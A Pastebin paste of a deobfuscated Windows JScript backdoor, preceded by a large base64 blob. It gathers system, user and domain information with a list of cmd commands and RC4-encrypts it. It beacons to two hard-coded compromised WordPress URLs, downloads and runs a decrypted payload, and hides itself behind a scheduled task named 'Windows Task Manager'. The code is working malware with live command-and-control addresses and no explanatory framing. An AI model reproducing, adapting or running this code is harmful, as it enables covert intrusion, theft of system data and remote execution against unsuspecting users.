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";
    175. return qGxZ;
    176. }
    177. ## ---- decoded eval
    178. function UspD(zDmy) {
    179. var m3mH = WScript.CreateObject("ADODB.Stream")
    180. m3mH.Type = 2;
    181. m3mH.CharSet = '437';
    182. m3mH.Open();
    183. m3mH.LoadFromFile(zDmy);
    184. var c0xi = m3mH.ReadText;
    185. m3mH.Close();
    186. return cz_b(c0xi);
    187. }
    188. var CKpR = new Array("http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php", "http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php");
    189. var tpO8 = "w3LxnRSbJcqf8HrU";
    190. var auME = new Array("systeminfo > ", "net view >> ", "net view /domain >> ", "tasklist /v >> ", "gpresult /z >> ", "netstat -nao >> ", "ipconfig /all >> ", "arp -a >> ", "net share >> ", "net use >> ", "net user >> ", "net user administrator >> ", "net user /domain >> ", "net user administrator /domain >> ", "set >> ", "dir %systemdrive%\x5cUsers\x5c*.* >> ", "dir %userprofile%\x5cAppData\x5cRoaming\x5cMicrosoft\x5cWindows\x5cRecent\x5c*.* >> ", "dir %userprofile%\x5cDesktop\x5c*.* >> ", "tasklist /fi \x22modules eq wow64.dll\x22 >> ", "tasklist /fi \x22modules ne wow64.dll\x22 >> ", "dir \x22%programfiles(x86)%\x22 >> ", "dir \x22%programfiles%\x22 >> ", "dir %appdata% >>");
    191. var QUjy = new ActiveXObject("Scripting.FileSystemObject");
    192. var LIxF = WScript.ScriptName;
    193. var w5mY = "";
    194. var ruGx = TfOh();
    195. function hLit(XngP, y1qa) {
    196. char_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    197. var Rj3c = "";
    198. var OKpB = "";
    199. for (var i = 0; i < XngP.length; ++i) {
    200. var B8wU = XngP.charCodeAt(i);
    201. var LUxg = B8wU.toString(2);
    202. while (LUxg.length < (y1qa ? 8 : 16))
    203. LUxg = "0" + LUxg;
    204. OKpB += LUxg;
    205. while (OKpB.length >= 6) {
    206. var vjUu = OKpB.slice(0, 6);
    207. OKpB = OKpB.slice(6);
    208. Rj3c += this.char_set.charAt(parseInt(vjUu, 2));
    209. }
    210. }
    211. if (OKpB) {
    212. while (OKpB.length < 6) OKpB += "0";
    213. Rj3c += this.char_set.charAt(parseInt(OKpB, 2));
    214. }
    215. while (Rj3c.length % (y1qa ? 4 : 8) != 0)
    216. Rj3c += "=";
    217. return Rj3c;
    218. }
    219. var b92A = [];
    220. b92A['C7'] = '80';
    221. b92A['FC'] = '81';
    222. b92A['E9'] = '82';
    223. b92A['E2'] = '83';
    224. b92A['E4'] = '84';
    225. b92A['E0'] = '85';
    226. b92A['E5'] = '86';
    227. b92A['E7'] = '87';
    228. b92A['EA'] = '88';
    229. b92A['EB'] = '89';
    230. b92A['E8'] = '8A';
    231. b92A['EF'] = '8B';
    232. b92A['EE'] = '8C';
    233. b92A['EC'] = '8D';
    234. b92A['C4'] = '8E';
    235. b92A['C5'] = '8F';
    236. b92A['C9'] = '90';
    237. b92A['E6'] = '91';
    238. b92A['C6'] = '92';
    239. b92A['F4'] = '93';
    240. b92A['F6'] = '94';
    241. b92A['F2'] = '95';
    242. b92A['FB'] = '96';
    243. b92A['F9'] = '97';
    244. b92A['FF'] = '98';
    245. b92A['D6'] = '99';
    246. b92A['DC'] = '9A';
    247. b92A['A2'] = '9B';
    248. b92A['A3'] = '9C';
    249. b92A['A5'] = '9D';
    250. b92A['20A7'] = '9E';
    251. b92A['192'] = '9F';
    252. b92A['E1'] = 'A0';
    253. b92A['ED'] = 'A1';
    254. b92A['F3'] = 'A2';
    255. b92A['FA'] = 'A3';
    256. b92A['F1'] = 'A4';
    257. b92A['D1'] = 'A5';
    258. b92A['AA'] = 'A6';
    259. b92A['BA'] = 'A7';
    260. b92A['BF'] = 'A8';
    261. b92A['2310'] = 'A9';
    262. b92A['AC'] = 'AA';
    263. b92A['BD'] = 'AB';
    264. b92A['BC'] = 'AC';
    265. b92A['A1'] = 'AD';
    266. b92A['AB'] = 'AE';
    267. b92A['BB'] = 'AF';
    268. b92A['2591'] = 'B0';
    269. b92A['2592'] = 'B1';
    270. b92A['2593'] = 'B2';
    271. b92A['2502'] = 'B3';
    272. b92A['2524'] = 'B4';
    273. b92A['2561'] = 'B5';
    274. b92A['2562'] = 'B6';
    275. b92A['2556'] = 'B7';
    276. b92A['2555'] = 'B8';
    277. b92A['2563'] = 'B9';
    278. b92A['2551'] = 'BA';
    279. b92A['2557'] = 'BB';
    280. b92A['255D'] = 'BC';
    281. b92A['255C'] = 'BD';
    282. b92A['255B'] = 'BE';
    283. b92A['2510'] = 'BF';
    284. b92A['2514'] = 'C0';
    285. b92A['2534'] = 'C1';
    286. b92A['252C'] = 'C2';
    287. b92A['251C'] = 'C3';
    288. b92A['2500'] = 'C4';
    289. b92A['253C'] = 'C5';
    290. b92A['255E'] = 'C6';
    291. b92A['255F'] = 'C7';
    292. b92A['255A'] = 'C8';
    293. b92A['2554'] = 'C9';
    294. b92A['2569'] = 'CA';
    295. b92A['2566'] = 'CB';
    296. b92A['2560'] = 'CC';
    297. b92A['2550'] = 'CD';
    298. b92A['256C'] = 'CE';
    299. b92A['2567'] = 'CF';
    300. b92A['2568'] = 'D0';
    301. b92A['2564'] = 'D1';
    302. b92A['2565'] = 'D2';
    303. b92A['2559'] = 'D3';
    304. b92A['2558'] = 'D4';
    305. b92A['2552'] = 'D5';
    306. b92A['2553'] = 'D6';
    307. b92A['256B'] = 'D7';
    308. b92A['256A'] = 'D8';
    309. b92A['2518'] = 'D9';
    310. b92A['250C'] = 'DA';
    311. b92A['2588'] = 'DB';
    312. b92A['2584'] = 'DC';
    313. b92A['258C'] = 'DD';
    314. b92A['2590'] = 'DE';
    315. b92A['2580'] = 'DF';
    316. b92A['3B1'] = 'E0';
    317. b92A['DF'] = 'E1';
    318. b92A['393'] = 'E2';
    319. b92A['3C0'] = 'E3';
    320. b92A['3A3'] = 'E4';
    321. b92A['3C3'] = 'E5';
    322. b92A['B5'] = 'E6';
    323. b92A['3C4'] = 'E7';
    324. b92A['3A6'] = 'E8';
    325. b92A['398'] = 'E9';
    326. b92A['3A9'] = 'EA';
    327. b92A['3B4'] = 'EB';
    328. b92A['221E'] = 'EC';
    329. b92A['3C6'] = 'ED';
    330. b92A['3B5'] = 'EE';
    331. b92A['2229'] = 'EF';
    332. b92A['2261'] = 'F0';
    333. b92A['B1'] = 'F1';
    334. b92A['2265'] = 'F2';
    335. b92A['2264'] = 'F3';
    336. b92A['2320'] = 'F4';
    337. b92A['2321'] = 'F5';
    338. b92A['F7'] = 'F6';
    339. b92A['2248'] = 'F7';
    340. b92A['B0'] = 'F8';
    341. b92A['2219'] = 'F9';
    342. b92A['B7'] = 'FA';
    343. b92A['221A'] = 'FB';
    344. b92A['207F'] = 'FC';
    345. b92A['B2'] = 'FD';
    346. b92A['25A0'] = 'FE';
    347. b92A['A0'] = 'FF';
    348. function TfOh() {
    349. var ayuh = Math.ceil(Math.random() * 10 + 25);
    350. var name = String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
    351. var dc9V = WScript.CreateObject("WScript.Network");
    352. w5mY = dc9V.UserName;
    353. for (var count = 0; count < ayuh; count++) {
    354. switch (Math.ceil(Math.random() * 3)) {
    355. case 1:
    356. name = name + Math.ceil(Math.random() * 8);
    357. break;
    358. case 2:
    359. name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 97));
    360. break;
    361. default:
    362. name = name + String.fromCharCode(Math.ceil(Math.random() * 24 + 65));
    363. break;
    364. }
    365. }
    366. return name;
    367. }
    368. var wyKN = Blgx(bIdG());
    369. try {
    370. var WE86 = bIdG();
    371. rGcR();
    372. jSm8();
    373. } catch (e) {
    374. WScript.Quit();
    375. }
    376. function jSm8() {
    377. var c9lr = Fv6b();
    378. while (true) {
    379. for (var i = 0; i < CKpR.length; i++) {
    380. var Ysyo = CKpR[i];
    381. var f3cb = XEWG(Ysyo, c9lr);
    382. switch (f3cb) {
    383. case "good":
    384. break;
    385. case "exit":
    386. WScript.Quit();
    387. break;
    388. case "work":
    389. XBL3(Ysyo);
    390. break;
    391. case "fail":
    392. tbMu();
    393. break;
    394. default:
    395. break;
    396. }
    397. TfOh();
    398. }
    399. WScript.Sleep((Math.random() * 300 + 3600) * 1000);
    400. }
    401. }
    402. function bIdG() {
    403. var spq3 = this['\u0041\u0063\u0074i\u0076eX\u004F\u0062j\u0065c\u0074'];
    404. var zBVv = new spq3('\u0057\u0053cr\u0069\u0070\u0074\u002E\u0053he\u006C\u006C');
    405. return zBVv;
    406. }
    407. function XBL3(B_TG) {
    408. var YIme = wyKN + LIxF.substring(0, LIxF.length - 2) + "pif";
    409. var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
    410. Kpxo.OPEN("post", B_TG, false);
    411. Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
    412. Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
    413. Kpxo.SETREQUESTHEADER("content-length:", "4");
    414. Kpxo.SEND("work");
    415. if (QUjy.FILEEXISTS(YIme)) {
    416. QUjy.DELETEFILE(YIme);
    417. }
    418. if (Kpxo.STATUS == 200) {
    419. var m3mH = new ActiveXObject("ADODB.STREAM");
    420. m3mH.TYPE = 1;
    421. m3mH.OPEN();
    422. m3mH.WRITE(Kpxo.responseBody);
    423. m3mH.Position = 0;
    424. m3mH.Type = 2;
    425. m3mH.CharSet = "437";
    426. var c0xi = m3mH.ReadText(m3mH.Size);
    427. var ptF0 = FXx9("2f532d6baec3d0ec7b1f98aed4774843", cz_b(c0xi));
    428. NoRS(ptF0, YIme);
    429. m3mH.Close();
    430. }
    431. var ruGx = TfOh();
    432. c5ae(YIme, B_TG);
    433. WScript.Sleep(30000);
    434. QUjy.DELETEFILE(YIme);
    435. }
    436. function tbMu() {
    437. QUjy.DELETEFILE(WScript.SCRIPTFULLNAME);
    438. eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, false);
    439. KhDn("TaskManager");
    440. WScript.Quit();
    441. }
    442. function XEWG(uXHK, hm2j) {
    443. try {
    444. var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
    445. Kpxo.OPEN("post", uXHK, false);
    446. Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
    447. Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
    448. var rRi3 = hLit(hm2j, true);
    449. Kpxo.SETREQUESTHEADER("content-length:", rRi3.length);
    450. Kpxo.SEND(rRi3);
    451. return Kpxo.responseText;
    452. } catch (e) {
    453. return "";
    454. }
    455. }
    456. function Sz8k() {
    457. var n9mV = "";
    458. var dc9V = WScript.CreateObject("WScript.Network");
    459. var rRi3 = tpO8 + dc9V.ComputerName + w5mY;
    460. for (var i = 0; i < 16; i++) {
    461. var YsXA = 0
    462. for (var j = i; j < rRi3.length - 1; j++) {
    463. YsXA = YsXA ^ rRi3.charCodeAt(j);
    464. }
    465. YsXA = (YsXA % 10);
    466. n9mV = n9mV + YsXA.toString(10);
    467. }
    468. n9mV = n9mV + tpO8;
    469. return n9mV;
    470. }
    471. function rGcR() {
    472. v_FileName = wyKN + LIxF.substring(0, LIxF.length - 2) + "js";
    473. QUjy.COPYFILE(WScript.ScriptFullName, wyKN + LIxF);
    474. var HFp7 = (Math.random() * 150 + 350) * 1000;
    475. WScript.Sleep(HFp7);
    476. eV_C("TaskManager", "Windows Task Manager", w5mY, v_FileName, "EzZETcSXyKAdF_e5I2i1", wyKN, true);
    477. }
    478. function Fv6b() {
    479. var m_Rr = wyKN + "~dat.tmp";
    480. for (var i = 0; i < auME.length; i++) {
    481. WE86.Run("cmd.exe /c " + auME[i] + "\x22" + m_Rr + "\x22", 0, true);
    482. }
    483. var nRVN = UspD(m_Rr);
    484. WScript.Sleep(1000);
    485. QUjy.DELETEFILE(m_Rr);
    486. return FXx9("2f532d6baec3d0ec7b1f98aed4774843", nRVN);
    487. }
    488. function c5ae(YIme, B_TG) {
    489. try {
    490. if (QUjy.FILEEXISTS(YIme)) {
    491. WE86.Run("\x22" + YIme + "\x22");
    492. }
    493. } catch (e) {
    494. var Kpxo = new ActiveXObject("MSXML2.XMLHTTP");
    495. Kpxo.OPEN("post", B_TG, false);
    496. var ePMy = "error";
    497. Kpxo.SETREQUESTHEADER("user-agent:", "Mozilla/5.0 (Windows NT 6.1; Win64; x64); " + Sz8k());
    498. Kpxo.SETREQUESTHEADER("content-type:", "application/octet-stream");
    499. Kpxo.SETREQUESTHEADER("content-length:", ePMy.length);
    500. Kpxo.SEND(ePMy);
    501. return "";
    502. }
    503. }
    504. function RPbY(r_X5) {
    505. var w8rG = "0123456789ABCDEF";
    506. var yjrw = w8rG.substr(r_X5 & 15, 1);
    507. while (r_X5 > 15) {
    508. r_X5 >>>= 4;
    509. yjrw = w8rG.substr(r_X5 & 15, 1) + yjrw;
    510. }
    511. return yjrw;
    512. }
    513. function NptO(jlEi) {
    514. return parseInt(jlEi, 16);
    515. }
    516. function eV_C(Bjmr, RT6x, O7Ec, YBwP, T9Px, egNr, rmGH) {
    517. try {
    518. var BGfI = WScript.CreateObject("Schedule.Service");
    519. BGfI.Connect();
    520. var w2cQ = BGfI.GetFolder("WPD");
    521. var xSm3 = BGfI.NewTask(0);
    522. xSm3.Principal.UserId = O7Ec;
    523. xSm3.Principal.LogonType = 6;
    524. var wK2F = xSm3.RegistrationInfo;
    525. wK2F.Description = RT6x;
    526. wK2F.Author = O7Ec;
    527. var aYbx = xSm3.Settings;
    528. aYbx.Enabled = true;
    529. aYbx.StartWhenAvailable = true;
    530. aYbx.Hidden = rmGH;
    531. var oSP7 = "2015年07月12日T11:47:24";
    532. var svaG = "2020年03月21日T08:00:00";
    533. var LDoN = xSm3.Triggers;
    534. var r9EC = LDoN.Create(9);
    535. r9EC.StartBoundary = oSP7;
    536. r9EC.EndBoundary = svaG;
    537. r9EC.Id = "LogonTriggerId";
    538. r9EC.UserId = O7Ec;
    539. r9EC.Enabled = true;
    540. var gQu9 = xSm3.Actions.Create(0);
    541. gQu9.Path = YBwP;
    542. gQu9.Arguments = T9Px;
    543. gQu9.WorkingDirectory = egNr;
    544. w2cQ.RegisterTaskDefinition(Bjmr, xSm3, 6, "", "", 3);
    545. return true;
    546. } catch (Err) {
    547. return false;
    548. }
    549. }
    550. function KhDn(Bjmr) {
    551. try {
    552. var UGgw = false;
    553. var BGfI = WScript.CreateObject("Schedule.Service");
    554. BGfI.Connect()
    555. var w2cQ = BGfI.GetFolder("WPD");
    556. var FLs6 = w2cQ.GetTasks(0);
    557. if (FLs6.count >= 0) {
    558. var gk1H = new Enumerator(FLs6);
    559. for (; !gk1H.atEnd(); gk1H.moveNext()) {
    560. if (gk1H.item().name == Bjmr) {
    561. w2cQ.DeleteTask(Bjmr, 0);
    562. UGgw = true;
    563. }
    564. }
    565. }
    566. } catch (Err) {
    567. return false;
    568. }
    569. }
    570. function cz_b(S3Ws) {
    571. var n9mV = [];
    572. var mvAu = S3Ws.length;
    573. for (var i = 0; i < mvAu; i++) {
    574. var wtVX = S3Ws.charCodeAt(i);
    575. if (wtVX >= 128) {
    576. var h = b92A['' + RPbY(wtVX)];
    577. wtVX = NptO(h);
    578. }
    579. n9mV.push(wtVX);
    580. }
    581. return n9mV;
    582. }
    583. function NoRS(ExY2, igeK) {
    584. var m3mH = WScript.CreateObject("ADODB.Stream");
    585. m3mH.type = 2;
    586. m3mH.Charset = "iso-8859-1";
    587. m3mH.Open();
    588. m3mH.WriteText(ExY2);
    589. m3mH.Flush();
    590. m3mH.Position = 0;
    591. m3mH.SaveToFile(igeK, 2);
    592. m3mH.close();
    593. }
    594. function Blgx(gaWo) {
    595. wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cMicrosoft\x5cWindows\x5c";
    596. if (!QUjy.FOLDEREXISTS(wyKN))
    597. wyKN = "c:\x5cUsers\x5c" + w5mY + "\x5cAppData\x5cLocal\x5cTemp\x5c";
    598. if (!QUjy.FOLDEREXISTS(wyKN))
    599. wyKN = "c:\x5cDocuments and Settings\x5c" + w5mY + "\x5cApplication Data\x5cMicrosoft\x5cWindows\x5c";
    600. return wyKN
    601. }
    602. function FXx9(Z_3F, VMd7) {
    603. var NNSX = [];
    604. var JDro = 0;
    605. var KagY;
    606. var n9mV = '';
    607. for (var i = 0; i < 256; i++) {
    608. NNSX[i] = i;
    609. }
    610. for (var i = 0; i < 256; i++) {
    611. JDro = (JDro + NNSX[i] + Z_3F.charCodeAt(i % Z_3F.length)) % 256;
    612. KagY = NNSX[i];
    613. NNSX[i] = NNSX[JDro];
    614. NNSX[JDro] = KagY;
    615. }
    616. var i = 0;
    617. var JDro = 0;
    618. for (var y = 0; y < VMd7.length; y++) {
    619. i = (i + 1) % 256;
    620. JDro = (JDro + NNSX[i]) % 256;
    621. KagY = NNSX[i];
    622. NNSX[i] = NNSX[JDro];
    623. NNSX[JDro] = KagY;
    624. n9mV += String.fromCharCode(VMd7[y] ^ NNSX[(NNSX[i] + NNSX[JDro]) % 256]);
    625. }
    626. return n9mV;
    627. }
    Advertisement
    Add Comment
    Please, Sign In to add comment
    Public Pastes
    We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
    Not a member of Pastebin yet?
    Sign Up, it unlocks many cool features!

    AltStyle によって変換されたページ (->オリジナル) /